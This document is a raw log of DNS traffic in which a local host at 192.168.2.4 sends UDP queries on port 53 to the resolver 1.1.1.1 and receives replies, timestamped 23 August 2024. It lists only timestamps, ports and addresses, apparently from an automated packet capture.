Aug 23, 2024 18:48:35.696650028 CEST	53	54208	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.696660042 CEST	53	65446	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.696670055 CEST	53	55758	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.697365999 CEST	53	54713	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.705281019 CEST	53	61987	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.811980009 CEST	53	50216	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.812308073 CEST	53	49774	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.814249992 CEST	53	61884	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.828066111 CEST	53	62371	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.829080105 CEST	53	61709	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.835279942 CEST	53	60462	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.966924906 CEST	53	59920	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.998894930 CEST	53	53115	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:36.025490046 CEST	53	52024	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.297363043 CEST	51234	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.298645020 CEST	53748	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.299717903 CEST	52239	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.299808025 CEST	53217	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.299964905 CEST	64530	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.300383091 CEST	62862	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.300853014 CEST	54957	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.300966978 CEST	63053	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.301599979 CEST	63716	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.301780939 CEST	65394	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.304699898 CEST	55624	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.306760073 CEST	56236	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.306931019 CEST	54199	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.307117939 CEST	49763	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.307142973 CEST	55462	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.307293892 CEST	53017	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.307467937 CEST	56139	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.307648897 CEST	52046	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.307739019 CEST	64279	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.307847023 CEST	59609	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.307931900 CEST	55099	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.308098078 CEST	61273	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.308120012 CEST	56629	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.308288097 CEST	58403	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.308367968 CEST	63143	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.308444977 CEST	53428	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.308581114 CEST	55810	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.308701992 CEST	55455	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.308794022 CEST	63223	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.308948994 CEST	57389	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.309032917 CEST	64677	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.309268951 CEST	57961	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.309480906 CEST	57421	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.309551954 CEST	56561	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.309695005 CEST	51060	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.309778929 CEST	50480	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.309917927 CEST	63552	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.310017109 CEST	56219	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.310142994 CEST	55540	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.310197115 CEST	50523	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.310329914 CEST	54908	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.310367107 CEST	51496	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.310537100 CEST	64539	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.310585976 CEST	55063	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.310729027 CEST	64063	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.310764074 CEST	59892	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.310920954 CEST	61937	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.310955048 CEST	54118	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.311124086 CEST	56433	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.311146021 CEST	53720	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.311325073 CEST	49450	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.311351061 CEST	57059	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.311537027 CEST	50018	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.311553001 CEST	60088	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.311737061 CEST	60160	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.311747074 CEST	56830	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.311927080 CEST	49347	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.311947107 CEST	57393	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.312124014 CEST	61720	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.312166929 CEST	58889	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.312354088 CEST	56333	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.312580109 CEST	49626	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.312580109 CEST	58553	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.312686920 CEST	65067	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.317545891 CEST	53	51234	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.319948912 CEST	53	53748	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.321139097 CEST	53	62862	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.321151972 CEST	53	63053	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.322737932 CEST	53	54957	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.322750092 CEST	53	65394	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.322758913 CEST	53	53217	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.325429916 CEST	53	63716	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.325464964 CEST	53	54199	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.326814890 CEST	53	56236	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.326826096 CEST	53	56139	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.326836109 CEST	53	49763	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.327322960 CEST	53	57961	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.327336073 CEST	53	60160	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.328936100 CEST	53	53428	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.328947067 CEST	53	53017	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.328955889 CEST	53	64539	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.328967094 CEST	53	56629	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.328975916 CEST	53	55540	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.328985929 CEST	53	57393	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.328994036 CEST	53	55462	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.329003096 CEST	53	57421	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.329013109 CEST	53	64677	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.329021931 CEST	53	58403	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.329037905 CEST	53	64279	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.329047918 CEST	53	60088	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.329929113 CEST	53	51496	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.329946041 CEST	53	52046	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.329955101 CEST	53	64063	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.329963923 CEST	53	50018	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.329972982 CEST	53	61720	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.329982996 CEST	53	55455	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.329991102 CEST	53	58553	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.329999924 CEST	53	54118	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.330009937 CEST	53	56561	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.330018997 CEST	53	50523	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.330029011 CEST	53	51060	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.331967115 CEST	53	65067	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.331978083 CEST	53	63223	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.331989050 CEST	53	50480	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.342757940 CEST	53	55624	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.346751928 CEST	53	64530	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.347364902 CEST	53	52239	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.350842953 CEST	53	63143	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.351134062 CEST	53	59609	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.351144075 CEST	53	57059	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.351582050 CEST	53	61937	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.351593018 CEST	53	57389	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.351603985 CEST	53	56433	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.352468967 CEST	53	58889	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.352485895 CEST	53	56333	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.352495909 CEST	53	49450	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.352509022 CEST	53	56830	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.352519035 CEST	53	49626	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.352529049 CEST	53	56219	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.352540970 CEST	53	49347	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.352550030 CEST	53	59892	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.353889942 CEST	53	55063	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.355401039 CEST	53	54908	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.361916065 CEST	53	55810	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.479933023 CEST	53	61273	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.483541965 CEST	53	53720	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.486804962 CEST	53	55099	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.494748116 CEST	53	63552	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.498559952 CEST	51686	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.499373913 CEST	58674	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.499552965 CEST	61350	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.499881983 CEST	60665	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.500304937 CEST	59621	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.500679016 CEST	55660	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.500758886 CEST	50026	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.501255989 CEST	50602	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.501286030 CEST	64609	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.501773119 CEST	52334	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.502105951 CEST	62629	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.502549887 CEST	49328	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.502669096 CEST	51545	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.503185034 CEST	64062	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.503583908 CEST	55448	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.503710032 CEST	63128	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.504254103 CEST	50005	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.504370928 CEST	49982	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.504838943 CEST	59072	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.505122900 CEST	50322	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.505168915 CEST	59926	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.505798101 CEST	53884	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.505896091 CEST	52563	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.506537914 CEST	50849	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.507006884 CEST	59599	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.507255077 CEST	57794	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.507950068 CEST	62426	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.508038998 CEST	61219	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.508466959 CEST	56573	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.508671045 CEST	51032	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.509181976 CEST	61159	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.509229898 CEST	50895	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.509743929 CEST	64407	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.510235071 CEST	56891	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.510345936 CEST	51884	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.510802984 CEST	63688	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.511387110 CEST	63917	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.511432886 CEST	55489	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.512129068 CEST	61870	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.512542963 CEST	52713	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.512662888 CEST	61699	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.513588905 CEST	53973	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.514260054 CEST	56436	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.514585018 CEST	53987	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.515206099 CEST	49340	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.515240908 CEST	57672	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.516015053 CEST	53507	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.516330957 CEST	53356	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.516606092 CEST	52296	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.517291069 CEST	56686	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.517796040 CEST	53	51686	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.517923117 CEST	62462	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.518013954 CEST	52481	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.518284082 CEST	53	61350	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.519428015 CEST	61209	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.519707918 CEST	53	59621	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.519721985 CEST	53	50026	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.520927906 CEST	57492	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.521362066 CEST	52011	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.521518946 CEST	58276	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.521661997 CEST	54411	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.521934032 CEST	62635	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.522136927 CEST	57050	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.522313118 CEST	58876	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.522325993 CEST	63125	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.522577047 CEST	56347	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.522730112 CEST	64224	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.522823095 CEST	51022	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:50.523876905 CEST	53	64609	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.523978949 CEST	53	52334	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.523996115 CEST	53	52563	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.526382923 CEST	53	49982	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.526393890 CEST	53	64062	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.526403904 CEST	53	49328	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.526412964 CEST	53	63128	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.526422977 CEST	53	50322	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.526432037 CEST	53	51545	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.526447058 CEST	53	50849	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.526457071 CEST	53	50005	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.526465893 CEST	53	55448	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.527344942 CEST	53	57794	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.529339075 CEST	53	59599	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.529350042 CEST	53	62426	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.529357910 CEST	53	56573	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.529371023 CEST	53	50895	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.529926062 CEST	53	64407	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.531910896 CEST	53	63688	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.531920910 CEST	53	53884	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.533155918 CEST	53	52713	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.534387112 CEST	53	56436	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.535288095 CEST	53	53987	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.535298109 CEST	53	49340	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.536715031 CEST	53	52481	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.536725044 CEST	53	53507	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.536734104 CEST	53	57672	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.537693977 CEST	53	56686	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.537703991 CEST	53	52296	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.538827896 CEST	53	62462	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.541533947 CEST	53	58876	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.541543961 CEST	53	60665	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.542494059 CEST	53	58674	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.542504072 CEST	53	58276	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.543761969 CEST	53	57050	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.543771982 CEST	53	64224	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.543783903 CEST	53	51022	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.543793917 CEST	53	50602	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.543803930 CEST	53	62629	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.544557095 CEST	53	59926	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.545979977 CEST	53	61219	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.546648979 CEST	53	51032	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.546659946 CEST	53	59072	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.547365904 CEST	53	61159	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.547375917 CEST	53	56891	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.548892975 CEST	53	63917	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.550122023 CEST	53	51884	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.551448107 CEST	53	61870	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.551459074 CEST	53	53973	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.554018021 CEST	53	55489	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.555339098 CEST	53	61699	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.557790041 CEST	53	53356	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.560197115 CEST	53	52011	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.560205936 CEST	53	54411	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.560215950 CEST	53	57492	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.561486006 CEST	53	56347	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.561988115 CEST	53	61209	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.665371895 CEST	53	55660	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.988430977 CEST	53	63125	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:50.989098072 CEST	53	62635	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:51.012039900 CEST	53824	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:51.013115883 CEST	61863	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:51.231919050 CEST	53	61863	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:51.325865030 CEST	53	53824	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.599138021 CEST	51623	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.600615978 CEST	60390	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.601932049 CEST	54817	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.602658033 CEST	63681	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.604034901 CEST	51987	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.604650974 CEST	63353	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.606050968 CEST	63527	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.606614113 CEST	61505	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.608494997 CEST	63990	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.609159946 CEST	60878	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.609886885 CEST	54983	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.609899044 CEST	51526	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.610548973 CEST	57461	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.611964941 CEST	53066	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.612175941 CEST	63696	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.614048004 CEST	50499	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.614059925 CEST	63306	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.614207029 CEST	62402	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.614279985 CEST	63540	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.614582062 CEST	50457	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.614728928 CEST	58110	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.614728928 CEST	51922	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.614800930 CEST	63147	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.614875078 CEST	62002	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.614968061 CEST	64217	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.615046978 CEST	51460	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.615144014 CEST	53210	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.615314007 CEST	60033	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.615324974 CEST	55870	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.615504980 CEST	64688	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.615561962 CEST	63994	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.615675926 CEST	62638	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.615778923 CEST	55367	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.616015911 CEST	62040	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.616029024 CEST	58021	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.616267920 CEST	52927	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.616327047 CEST	50001	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.616494894 CEST	49812	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.616729021 CEST	55105	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.616751909 CEST	61849	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.616919994 CEST	56710	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.616959095 CEST	51333	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.617146015 CEST	62161	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.617146015 CEST	63650	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.617296934 CEST	49493	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.617337942 CEST	64213	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.617503881 CEST	55976	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.617503881 CEST	62286	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.617700100 CEST	51078	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.617712975 CEST	57385	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.617902040 CEST	56994	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.617902040 CEST	60109	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.618071079 CEST	60076	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.618109941 CEST	51632	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.618308067 CEST	58452	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.618308067 CEST	64195	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.618495941 CEST	65298	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.618531942 CEST	64341	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.618727922 CEST	63554	53	192.168.2.4	1.1.1.1
